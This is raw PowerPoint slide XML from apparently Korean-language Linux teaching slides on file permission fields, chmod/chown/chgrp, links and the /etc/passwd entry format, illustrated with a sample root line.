            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="직사각형 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D8CB7F-1805-4BA8-8095-18449B9D6637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796432" y="4853871"/>
            <a:ext cx="2629911" cy="30823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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소유자         그룹      그 외 사용자</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4164181-C968-4939-BB20-312766274B1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4529976"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hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="직사각형 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B23E1C-7278-4F30-8781-3E67C7B59049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5392708"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소유자</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="직사각형 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB63036E-F95E-4978-8FDB-7AEF1C936ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6255440"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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>그룹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="직사각형 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF267AA7-EC6B-4078-A6E6-4D411A5869A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7118172"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크기</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="직사각형 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B5CFB8-9188-40EF-BFFC-0BD1DB1525CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980904" y="4849150"/>
            <a:ext cx="93651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날짜</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="직사각형 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C1C0C8B-2A31-434E-8B45-C7A303DFD620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902354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시간</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="직사각형 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E3F3854-0F36-4D97-B76E-7CB3C4CC078F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="985702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파일</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="직사각형 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42E75242-23A3-4685-8C52-5FDCD1CE8558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10690504" y="4849150"/>
            <a:ext cx="95790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7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>링크일시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>원본 위치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="직선 연결선 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA808E0-0D3C-490C-B5D2-A056079761CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="624021" y="3503851"/>
            <a:ext cx="824453"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CA5FDC2B-44E8-4603-841D-546060A1EEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8431901" y="3503851"/>
            <a:ext cx="3216504"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4FFF81D-03AB-458A-B776-08BB39F2B7D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909721" y="3932031"/>
            <a:ext cx="339866" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4A5AB1-4544-42C6-B13B-640FEDB56BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799846" y="3936616"/>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
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35DAE0FF-F3FB-40E5-9A14-F84D3AACDDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673781" y="3932031"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41402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1" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="32" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="40"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898EF855-C8A2-48AE-839B-3EB791ECF575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071561" y="3663584"/>
            <a:ext cx="4656836" cy="16124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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>그룹</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CB23F0BC-E016-418E-9068-3256C9BADE96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324559" y="2024354"/>
            <a:ext cx="3110677"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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="직선 연결선 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417E6E68-9E93-491F-B622-A372FF3D0F8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="33" idx="0"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4122892" y="2666998"/>
            <a:ext cx="1201667" cy="6426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36" name="Picture 12" descr="하다하다 이제 '훈련소+군대 영장'까지 만들어 재입대시키려는(?) '동물의 숲' 한국인들 - 인사이트">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDD8F25-8C7C-428E-A48E-1245B11706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0315" y="3451667"/>
            <a:ext cx="2938953" cy="179696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군인이모티콘2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95818F05-95F6-455B-90F8-2599738D651C}"/>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697963" y="4039873"/>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4" descr="군인이모티콘2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABC7967-91FD-4B8F-9975-CEEB936EB61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252210"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4" descr="군인이모티콘2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8314F140-EC7E-4BF9-8A5D-F9B97C2E64E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271725"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4" descr="군인이모티콘2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70A1689-6E93-48BC-B4A0-7C469907EE53}"/>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291240" y="4039873"/>
            <a:ext cx="980485" cy="980485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="직사각형 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD160C5-9747-44F1-B531-621E04085703}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3107342" y="3309642"/>
            <a:ext cx="2031100" cy="56725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생활관 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="TextBox 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0FAEDE-62F4-4BD8-BBAB-F8B3CB5D9843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8553724" y="2024354"/>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X</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F672B7-E6D6-43D6-B10D-82CD5B298EE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583907" y="5390652"/>
            <a:ext cx="2938953"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endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="TextBox 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBEFEEC9-66C8-4FD1-B4DB-BDD3F54008E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641348" y="5390652"/>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O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="직선 연결선 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15AD0634-34AD-4089-8EEB-D69A57EA9A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1038" idx="2"/>
            <a:endCxn id="59" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188206" y="5020358"/>
            <a:ext cx="865178" cy="37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3666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권한의 수치화</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ADA98B5C-DE42-4E98-9D9F-70C0C1514A70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2587148" y="2088982"/>
            <a:ext cx="6651746" cy="3554119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D6D21A-9334-4E13-965E-48C9017EC1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771030" y="6041395"/>
            <a:ext cx="9988826" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>파일의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>권한</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>소유자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>소유그룹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 을 바꿀 수 있을까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>? =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>chgrp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">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FD8F91E4-BF0F-4976-841A-2CE0248EC1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10028016" y="6122873"/>
            <a:ext cx="352631" cy="287854"/>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0618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/Theory/T3/Link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링크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(link)</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35856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/Theory/T3/Passwd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패스워드 구조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– passwd</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F32F146-E1C2-49FC-BBF1-BAF71F5A42BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385098" y="2380416"/>
            <a:ext cx="4917170" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>root:x:0:0:root:/root:/bin/bash</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11E49470-FC9A-4ED5-ABA6-3825AB4E4AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1054908545"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1865134" y="2991360"/>
          <a:ext cx="9131889" cy="2924874"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9131889">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3393743844"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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계정 이름 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(ID)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x : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 비밀 번호 </a:t>
